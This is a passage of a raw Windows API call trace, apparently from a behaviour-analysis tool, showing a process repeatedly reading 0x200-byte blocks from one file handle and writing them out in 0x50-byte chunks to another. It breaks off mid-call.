[0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.921] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, 
lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.923] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.924] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 
[0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.926] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.926] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: 
lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.927] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.927] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 
[0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.929] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.929] GetFileType (hFile=0x50) returned 0x1 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, 